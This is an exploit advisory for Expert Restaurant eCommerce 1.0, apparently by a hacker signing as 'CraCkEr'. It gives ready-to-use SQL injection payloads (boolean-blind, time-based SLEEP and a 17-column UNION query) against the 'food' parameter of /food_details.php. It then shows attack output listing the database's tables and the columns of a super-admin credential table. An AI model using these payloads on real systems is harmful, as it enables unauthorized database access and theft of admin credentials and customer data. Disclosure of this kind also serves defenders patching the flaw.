Expert Restaurant eCommerce version 1.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://www.codester.com/items/20872/ │
│ Vendor : Expert IT Solution │
│ Software : Expert Restaurant eCommerce 1.0 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /food_details.php
https://www.website/food_details.php?food=[SQLI]
GET parameter 'food' is vulnerable to SQL Injection
---
Parameter: food (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[+] Starting the Attack
fetching current database
current database: 'sagor_****_restu'
fetching tables
[34 tables]
+--------------------------+
| add_to_cart_view |
| admin_url |
| contact_manage |
| currencies |
| customer_info |
| delivery_live_status |
| expense_manage |
| food_category |
| food_dish_manage |
| food_dish_vari_man |
| food_field_variant |
| food_field_variant_value |
| food_order_confirm |
| food_review |
| food_sub_category |
| food_tag |
| gallery_manage |
| hall_manage |
| income_manage |
| kitchen_live_sta |
| menu_manage |
| opening_manage |
| order_accounts |
| order_other_address |
| page_manage |
| payment_gateway |
| shipping_charge |
| site_setting |
| slider_manage |
| social_manage |
| sup_ad_log |
| table_book |
| table_manage |
| team_manage |
+--------------------------+
fetching columns for table 'sup_ad_log'
[5 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| status | varchar(100) |
| id | int(11) |
| sup_admin_name | varchar(100) |
| sup_pass | varchar(100) |
| sup_user | varchar(100) |
+----------------+--------------+
[-] Done
